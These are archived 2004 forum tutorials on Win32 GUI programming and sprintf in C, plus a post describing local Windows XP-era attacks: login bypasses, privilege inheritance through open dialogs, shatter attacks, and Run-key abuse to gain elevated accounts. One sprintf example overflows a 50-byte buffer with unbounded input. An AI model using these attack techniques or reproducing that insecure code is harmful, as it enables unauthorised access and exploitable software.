TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
switch(Message) {
case WM_CLOSE:
DestroyWindow(hwnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, Message, wParam, lParam);
}
return 0;
}
Right, now lets move onto TEXT!
So..... how do we write text to the screen? It isn't very easy nor hard.
CODE
#include <windows.h>
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
static char gszClassName[] = "darkblue";
static HINSTANCE ghInstance = NULL;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
WNDCLASSEX WndClass;
HWND hwnd;
MSG Msg;
ghInstance = hInstance;
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.style = NULL;
WndClass.lpfnWndProc = WndProc;
WndClass.cbClsExtra = 0;
WndClass.cbWndExtra = 0;
WndClass.hInstance = ghInstance;
WndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
WndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = gszClassName;
WndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if(!RegisterClassEx(&WndClass)) {
MessageBox(0, "Error Registering Window!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
hwnd = CreateWindowEx(
WS_EX_STATICEDGE,
gszClassName,
"darkblue owNz!",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
320, 240,
NULL, NULL,
ghInstance,
NULL);
if(hwnd == NULL) {
MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
ShowWindow(hwnd, nCmdShow);
UpdateWindow(hwnd);
while(GetMessage(&Msg, NULL, 0, 0)) {
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
HDC hdc;
PAINTSTRUCT ps;
LPSTR szMessage = "darkblue 0wNz j00!";
switch(Message) {
case WM_PAINT:
hdc = BeginPaint(hwnd, &ps);
TextOut(hdc, 70, 50, szMessage, strlen(szMessage));
EndPaint(hwnd, &ps);
break;
case WM_CLOSE:
DestroyWindow(hwnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, Message, wParam, lParam);
}
return 0;
}
WHOA! wtf is all that new stuff. All this does is print "darkblue OwNz j00!" to the screen. Not very pretty tongue.gif
Now let's explain. At the top of the WinProc I added a few more variables. HDC identifies the display DC to used
for painting to the screen. PS is out paint structure. The PAINTSTRUCT structure contains information for an
application. This info can be used to paint to the client area of our windows. Message is a simple char array that
holds our message.
After that I added a new case statement. Remember what I said about how UpdateWindow() sends the message WM_PAINT,
well here is where we can use it. Firstly we have to tell the HDC to recieve painting information from BeginPaint().
Now, BeginPaint() takes the following parameters:
hwnd - This identifies the window to be painted to.
pPaint - A pointer to the PAINTSTRUCT structure that will recieve the painting info.
Once we've done that, we can use TextOut() to print to the screen. Now TextOut() takes the following parameters:
hdc - This identifies the device context.
nXStart - Specifies the x-coordinate of the reference point that Windows uses to align the string.
nYStart - Specifies the y-coordinate of the reference point that Windows uses to align the string.
lpString - This points to the string that we want to print.
cbStrng - This specifies the number of chars. in the string.
OK, now for EndPaint(). EndPaint() tells the program that we are done printing to the screen. It takes the following
parameters:
hwnd - This identifies the window that we painted to.
lpPaint - This points to the PAINTSTRUCT structure that we used that contains the painting info. retrieved
by BeginPain().
>Controls:
What are controls? Controls are like child windows such as buttons, checkboxes, edit boxes etc etc. For each new
control that we make we make a new window using CreateWindowEx(), but these are childs of the first main window
and are not new windows.
OK, i've put everything that i could think of together and this is what I came up with:
CODE
#include <windows.h>
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
static char gszClassName[] = "db Tutorial";
static HINSTANCE ghInstance = NULL;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
WNDCLASSEX WndClass;
HWND hwnd;
MSG Msg;
ghInstance = hInstance;
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.style = NULL;
WndClass.lpfnWndProc = WndProc;
WndClass.cbClsExtra = 0;
WndClass.cbWndExtra = 0;
WndClass.hInstance = ghInstance;
WndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
WndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = gszClassName;
WndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if(!RegisterClassEx(&WndClass)) {
MessageBox(0, "Error Registering Window!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
hwnd = CreateWindowEx(
WS_EX_STATICEDGE,
gszClassName,
"darkblue 0wNz j00!",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
320, 240,
NULL, NULL,
ghInstance,
NULL);
if(hwnd == NULL) {
MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
ShowWindow(hwnd, nCmdShow);
UpdateWindow(hwnd);
while(GetMessage(&Msg, NULL, 0, 0)) {
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
HWND hButton, hCombo, hEdit, hList, hScroll, hStatic;
switch(Message) {
case WM_CREATE:
hButton = CreateWindowEx(
NULL,
"Button",
"Button Example",
WS_BORDER | WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,
0, 0,
100, 30,
hwnd, NULL,
ghInstance,
NULL);
hCombo = CreateWindowEx(
NULL,
"ComboBox",
"darkblue",
WS_BORDER | WS_CHILD | WS_VISIBLE | CBS_DROPDOWNLIST,
0, 30,
100, 100,
hwnd, NULL,
ghInstance,
NULL);
hEdit = CreateWindowEx(
NULL,
"Edit",
"edit box example",
WS_BORDER | WS_CHILD | WS_VISIBLE,
0, 60,
100, 30,
hwnd, NULL,
ghInstance,
NULL);
hList = CreateWindowEx(
NULL,
"ListBox",
"db db db",
WS_BORDER | WS_CHILD | WS_VISIBLE,
100, 0,
100, 200,
hwnd, NULL,
ghInstance,
NULL);
hScroll = CreateWindowEx(
NULL,
"ScrollBar",
"",
WS_BORDER | WS_CHILD | WS_VISIBLE | SBS_VERT,
210, 0,
100, 200,
hwnd, NULL,
ghInstance,
NULL);
hStatic = CreateWindowEx(
NULL,
"Static",
"",
WS_BORDER | WS_CHILD | WS_VISIBLE | SS_BLACKRECT,
0, 90,
100, 30,
hwnd, NULL,
ghInstance,
NULL);
break;
case WM_CLOSE:
DestroyWindow(hwnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, Message, wParam, lParam);
}
return 0;
}
I have already explained the CreateWindowEx() API so this should be fairly simple. If you don't understand anything,
feel free to contact me OR look it up on google.
>Menus:
When programming there are usually a few ways of doing something, making a menu is no different tongue.gif. I am going
to go over 2 ways of making a menu. Both will do the same thing.
>>Method 1: Making a menu using Resources
From what I have done and seen, using resources to make a menu is one of the easiest things. Basically, the menu
is predefined in a resource file (a file with a .rc extention). The resource files are compiled by the resouce
compiler and linked to the program when the linker is run. This is the first program where I am also going to
throw in additional files besides the source files.
Our header file:
This is our header file. Here we are just defining all the ID's we are going to use so that we can just include
this in both the resource file and in the source file. (Save as tutorial.h)
CODE
#define ID_FILE_NEW 100
#define ID_FILE_OPEN 101
#define ID_FILE_SAVE 102
#define ID_FILE_EXIT 103
#define ID_DO_SOMETHING 104
#define ID_DO_SOMETHING_ELSE 105
#define ID_HELP_ABOUT 106
Our resource file:
This is going to be our resource file. Here we just define the layout of the menus and giving them message
ID's. These message ID's have to be defined in both the resource file and the source file. This is why we use a
header file to define them and then we just include the header file.
CODE
#include "tutorial.h"
ID_MENU MENU DISCARDABLE
BEGIN
POPUP "&File"
BEGIN
MENUITEM "&New", ID_FILE_NEW
MENUITEM "&Open", ID_FILE_OPEN
MENUITEM "&Save", ID_FILE_SAVE
MENUITEM SEPARATOR
MENUITEM "E&xit", ID_FILE_EXIT
END
POPUP "&Do"
BEGIN
MENUITEM "&blaaaa", ID_DO_SOMETHING
MENUITEM "lalalalallal", ID_DO_SOMETHING_ELSE
END
POPUP "&Help"
BEGIN
MENUITEM "&About db", ID_HELP_ABOUT
END
END
Main source file:
CODE
#include <windows.h>
#include "tutorial.h"
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
static char gszClassName[] = "db";
static HINSTANCE ghInstance = NULL;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
WNDCLASSEX WndClass;
HWND hwnd;
MSG Msg;
ghInstance = hInstance;
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.style = NULL;
WndClass.lpfnWndProc = WndProc;
WndClass.cbClsExtra = 0;
WndClass.cbWndExtra = 0;
WndClass.hInstance = ghInstance;
WndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
WndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
WndClass.lpszMenuName = "ID_MENU";
WndClass.lpszClassName = gszClassName;
WndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if(!RegisterClassEx(&WndClass)) {
MessageBox(0, "Window Registration Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
hwnd = CreateWindowEx(
WS_EX_STATICEDGE,
gszClassName,
"db's Menu Tutorial",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
320, 240,
NULL, NULL,
ghInstance,
NULL);
if(hwnd == NULL) {
MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
ShowWindow(hwnd, nCmdShow);
UpdateWindow(hwnd);
while(GetMessage(&Msg, NULL, 0, 0)) {
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
switch(Message) {
case WM_CLOSE:
DestroyWindow(hwnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
switch(LOWORD(wParam)) {
case ID_FILE_NEW:
MessageBox(hwnd, "You Clicked New File", "Menu", 0);
break;
case ID_FILE_OPEN:
MessageBox(hwnd, "Blaaa ... Open File", "Menu", 0);
break;
case ID_FILE_SAVE:
MessageBox(hwnd, "Save Save Save", "Menu", 0);
break;
case ID_FILE_EXIT:
PostQuitMessage(0);
case ID_DO_SOMETHING:
MessageBox(hwnd, "blaaaaaa!", "Menu", 0);
break;
case ID_DO_SOMETHING_ELSE:
MessageBox(hwnd, "lalalalllaa", "Menu", 0);
break;
case ID_HELP_ABOUT:
MessageBox(hwnd, "db 0wnZ j00!!", "About", 0);
break;
}
break;
default:
return DefWindowProc(hwnd, Message, wParam, lParam);
}
return 0;
}
You see we have changed the "WndClass.lpszMenuName" to what the name of our menu is. There we also added a
WM_COMMAND in our switch statement. This is the message that is posted when a person clicks on a menu item.
The ID of the item is sent with the message. We use LOWORD() to get the message from the lower word of the
32-bit. LOWORD() takes the following parameters:
dwValue - The value to get the lower word from.
>>Method 2: Making a menu on the spot
Using resource menus is great if you want a menu that won't change. But some programs require menu's that can
be changed on the spot! This might be used to add or delete items from the menu or to make some menu items grey.
Header file:
CODE
#define ID_FILE_NEW 100
#define ID_FILE_OPEN 101
#define ID_FILE_SAVE 102
#define ID_FILE_EXIT 103
#define ID_DO_SOMETHING 104
#define ID_DO_SOMETHING_ELSE 105
#define ID_HELP_ABOUT 106
Main source file:
CODE
#include <windows.h>
#include "tutorial.h"
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
static char gszClassName[] = "db";
static HINSTANCE ghInstance = NULL;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
WNDCLASSEX WndClass;
HWND hwnd;
MSG Msg;
ghInstance = hInstance;
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.style = NULL;
WndClass.lpfnWndProc = WndProc;
WndClass.cbClsExtra = 0;
WndClass.cbWndExtra = 0;
WndClass.hInstance = ghInstance;
WndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
WndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = gszClassName;
WndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if(!RegisterClassEx(&WndClass)) {
MessageBox(0, "Window Registration Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
hwnd = CreateWindowEx(
WS_EX_STATICEDGE,
gszClassName,
"db Menu Tutorial",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
320, 240,
NULL, NULL,
ghInstance,
NULL);
if(hwnd == NULL) {
MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
ShowWindow(hwnd, nCmdShow);
UpdateWindow(hwnd);
while(GetMessage(&Msg, NULL, 0, 0)) {
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
HMENU hMenu, hSubMenu;
switch(Message) {
case WM_CLOSE:
DestroyWindow(hwnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_CREATE:
hMenu = CreateMenu();
hSubMenu = CreatePopupMenu();
AppendMenu(hSubMenu, MF_STRING, ID_FILE_NEW, "&New");
AppendMenu(hSubMenu, MF_STRING, ID_FILE_OPEN, "&Open");
AppendMenu(hSubMenu, MF_STRING, ID_FILE_SAVE, "&Save");
AppendMenu(hSubMenu, MF_SEPARATOR, 0, 0);
AppendMenu(hSubMenu, MF_STRING, ID_FILE_EXIT, "E&xit");
AppendMenu(hMenu, MF_STRING | MF_POPUP, (UINT)hSubMenu, "&File");
hSubMenu = CreatePopupMenu();
AppendMenu(hSubMenu, MF_STRING, ID_DO_SOMETHING, "&blaaaa");
AppendMenu(hSubMenu, MF_STRING, ID_DO_SOMETHING_ELSE, "lalalalal");
AppendMenu(hMenu, MF_STRING | MF_POPUP, (UINT)hSubMenu, "&Do");
hSubMenu = CreatePopupMenu();
AppendMenu(hSubMenu, MF_STRING, ID_HELP_ABOUT, "&About db");
AppendMenu(hMenu, MF_STRING | MF_POPUP, (UINT)hSubMenu, "&Help");
SetMenu(hwnd, hMenu);
break;
case WM_COMMAND:
switch(LOWORD(wParam)) {
case ID_FILE_NEW:
MessageBox(hwnd, "A brand newwwww newww file", "Menu", 0);
break;
case ID_FILE_OPEN:
MessageBox(hwnd, "OoOpen a File!", "Menu", 0);
break;
case ID_FILE_SAVE:
MessageBox(hwnd, "Save Save save Save", "Menu", 0);
break;
case ID_FILE_EXIT:
PostQuitMessage(0);
case ID_DO_SOMETHING:
MessageBox(hwnd, "blaaaaa!", "Menu", 0);
break;
case ID_DO_SOMETHING_ELSE:
MessageBox(hwnd, "lalalalalalal", "Menu", 0);
break;
case ID_HELP_ABOUT:
MessageBox(hwnd, "db definately 0wNz j00!!", "About", 0);
break;
}
break;
default:
return DefWindowProc(hwnd, Message, wParam, lParam);
}
return 0;
}
Righto! At the top you may have noticed that I set "WndClass.lpszMenuName" back to NULL. That is because we are
making the menu on the spot and don't need a resource file. First you might notice we added WM_CREATE to our
switch() statement. This is the message that is sent when our window is first created. We also declare 2 variables
of type HMENU. You see that we set hMenu to CreateMenu(). This will start our whole menu. Then we set hSubMenu
to CreatePopupMenu(). This will make a blank sub menu. Then we need to fill it. You see we call AppendMenu() to
add items to our menu. AppendMenu() takes the following parameters:
hMenu - This identifies the menu bar.
uFlags - This specifies flags to control the appearence and behaviour of our menu item.
ulDNNewItem - This specifies either the identifier of the menu item or if the uFlags parameter is set to
"MF_POPUP", the handle to the drop-down menu or submenu.
lpNewItem - This specifies the content of the new menu item.
After we have done that, we see SetMenu(). This is what actually displays the menu to us. SetMenu() takes the following
parameters:
hWnd - This identifies the window to which the menu is to be assigned to.
hMenu - This identifies the new menu. If it is set to NULL then the windows current menu is removed.
------------------------------------------------
OK, thats it. End of tutorial. Anything else I should cover?
The traditional shout outs to: Xander, Barnzey, dumbtech, soad, njkt, Blademaster, nofrillz, Napster, jackhole and everyone else I missed.
Laters...
darkblue
2004
=-=-EOF=-=-
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2007 Invision Power Services, Inc.
-------------------------------
Help - Search - Members - Calendar
Full Version: Hacking a windows PC
rohitab.com - Forums > Community > Tutorials
nielserman
Nov 23 2004, 07:18 PM
Hacking a windows PC (The Manual)
Blademaster
11/23/2004 20:15
---
Intoduction
=
This tutorial is about hacking windows with local access only! Do not expect to learn how to remotely break into a computer. Everything in this tutorial is based on a windows XP machine.
This tutorial is best viewed in notepad with character loopback on. The writer (Blademaster) is in no way responsible for any acts based upon descriptions in this tutorial. Any mistakes in english are transmission errors the author can't be held responsible for.
=
---
1. Gaining access
=
First thing, we want to gain access to the windows box. I don't want to explain this very thorough, as there are a lot of tutorials already explaining this. The following methods for home PC's badly configured.
1. On win9X, try hitting alt-F4 or close the login window as soon as it comes up. This should get you right into the guest account. An administrator can disable this, so it might not always work.
2. On winNT based systems: Try booting into safemode and use the administator account (unpassworded). The account might be passworded by a system admin.
Other means of getting a password to the PC.
1. Sniffing the network for unencrypted authentication traffic.
2. Social engineering.
3. Trojaning.
4. Brute forcing. (Guessing obvious passwords).
=
---
2. Privilege escalation
=
2.1 Bad configuration
=
On many PC's, bad configuration is very common. Bad configuration can be anything, from guest or non-admin users having privileges they shouldn't have like power to browse vital directory's, to being able to download and install to C:\ or root disk.
=
2.2 Privilege Inheritance
=
Privilege inheritance is about programs getting the same privilege as their spawning parent. A common mistake like this is log viewing in server applications. For example, program X is a server for streaming music, it is run as "Local System" with full privileges. X gives it's users the capability to view log files from the application itself. Hacker Y opens the IDE for the server and presses the "View Logs" button. A nice open dialog shows itself and Y browses to C:\windows\system32\, right clicks cmd.exe and chooses the option "Open". Hacker Y has "Local System" privileges over the computer now because program X forgot to lower the privileges of cmd.exe to the actual user privilege.
This action can also be made with a simple shatter attack to win32hlp.exe's open dialog box.
If a program has a higher privilege then the current user the attacker is on and has some kind of file interaction, it is definetly worth to check for a privilege inheritence attack.
=
2.3 Shatter attacks
=
Win32 platforms are build on two mechanisms, API's and Windows Messaging. The last one is the one we are interested in. What the windows messaging structure does is send actions and happenings to a program using the SendMessage() function. win32 C++ programmers will recognize this from the callback function required for a windows application to work properly. The message system controls a lot of functions, such as dropdown boxes, timers, dialogs and user input. The problem with this structure is that there is no way for the message structure to see where the "Message" came from, so the user can send any message and achieve the same results as explorer.exe would. (not up to date, microsoft has kind of locked functions like timer functions, to keep memory jumping from happening). Simple exploiting: look up the SendMessage API from msdn.
=
2.4 Auto start-up exploiting
=
Any instructions that windows uses on what applications to execute at a user log-in are insecure! Any user can edit regedit and put a file in the HKEY_LOCAL_USER\software\microsoft\windows\run directory, or any other way of starting up. This means an attacker with a guest account can edit the registery to open a bot that edits or makes a user account with elevated privileges. This can also be used to copy whole secured directory's, or phising for a password from the administrator.
=
---
3. Greetz!
=
Ugh, I always forget someone sad.gif Anyhows, Greetz go out to: Xander, Dumbtech(B3N`), Darkblue, Michiel, Barnzey, Sekio, SOAD2k, Legibleskate (wherever he is), Sheephead, Raven and the whole TGS Crew, hackerlounge and it's members, EA games for keeping me entertained and anyone who I respect but forgot (damn, I'm so sorry).
---
4. Advertisements, copyright and other bullshit no-one will read
=
Dont copy/edit/disrespect my shit, visit djblade.b3n.cc for great music and C++ source codes and go to euroadrenaline.com!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2007 Invision Power Services, Inc.
0----------------------------------------
Help - Search - Members - Calendar
Full Version: Sprintf Tutorial in C
rohitab.com - Forums > Community > Tutorials
Master Nokia1
Nov 27 2004, 07:35 PM
How to use Sprintf()
To understand how to use sprintf, you should know how sprintf is defined(in <stdio.h> header).
It is defined as such:
int sprintf ( char * buffer, const char * format [ , argument , ...] );
Ill explain the following piece by peice:
Buffer:
The buffer is the place to store the resulting string from using the function(notice its also a pointer. so it points to the specific buffer in memory)
Format:
This is the string that contains the text to be printed.
It can also be used to contain format tags
Format flags should follow this:
%[flags][width][.precision][modifiers]type
The types that youll insert are explained here:
Type - Description - Example
c | Character | a
e |Sci Notation | 1.42e34
E |Sci Notation | 1.42E34
f |Dec. Float | 193.53
o |Signed Octal | 610
d or i |Integer | 32
s | String | sprintf rocks
u |unsigned Dec| 43525
p |Address point| A340:0000
x |Hexadecimal | 3fa
X |Hexadecimal | 3FA
n |Nothing |
The diffences between x and X or e and E is that they print capital letters instead of lower case(3fa would be printed with x and 3FA would be printed with X)
The flags, width, .precision, modifiers are completely optional but if youd like to input them heres what they are:
Flags - Description
- | Left align the with given width(right is default)
+ | Forces to preced with positive/negative sign(- is default)
blank | If the arg is + signed then a blank is inserted before
# |1. Used with f, e, E makes output contain decimal
|2. Used with x, X, o value is preced with 0, 0x, 0X
width - Description
number | Minimum number of characters to be printed If the value to be printed is shorter than this number the result is padded with blanks. The value is never truncated even if the result is larger.
0number | Same as above but filled with 0s instead of blanks.
* | The width is not specified in the format string, it is specified by an integer value preceding the argument thas has to be formatted.
.precision:
for d, i, o, u, x, X types: precision specifies the minimum number of decimal digits to be printed. If the value to be printed is shorter than this number the result is padded with blanks. The value is never truncated even if the result is larger.(if nothing specified default is 1).
for e, E, f types: number of digits to be printed after de decimal point. (if nothing specified default is 6).
for g, G types : maximum number of significant numbers to be printed.
for s type: maximum number of characters to be printed. (default is to print until first null character is encountered).
for c type : (no effect).
Thats the best description i could find
modifier - Description
h | Interpreted as a short int
l | Interpreted as a long int(integers) or double (floats)
L | Interpreted as a long double(floats)
The [arguments] command is an elipses so you can put as many types of arguments as you want.
That should be enough information for you guys to understand most of whats going on
heres a few sprintf() examples for everybody:
CODE
#include <stdio.h>
// ^ must include to use sprintf()
// we will start with a simple integer ex.
int main()
{
char buff[50];
int ret, a = 34, b = 234;
ret = sprintf(buff, "%d minus %d equals %d",a,b,a-b);
printf ("(%s) is the result of our sprintf, which is %d characters long",buff,ret);
return 0;
}
CODE
#include <stdio.h>
//we'll have this string tutorial then
int main()
{
char buff[50], string[100];
int ret;
printf("What is your favorite color??\n");
scanf("%s",&string);
ret = sprintf(buff, "your favorite is %s!! Mine is too",string);
printf("%s",buff);
}
CODE
#include <stdio.h>
//hex and oct examples
int main()
{
char buff[50];
int ret, hex = 4325, oct = 5626;
ret = sprintf(buff, "%x is %d in hex and %o is %d in octal",hex,hex,oct,oct);
printf("%s, %d chars long", buff, ret);
return 0;
}
note: You dont need the return values. (ret in all the examples, they are just to see how long the strings are)
sidenote:
I apologize for the crappy tables
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2007 Invision Power Services, Inc.
------------------------------
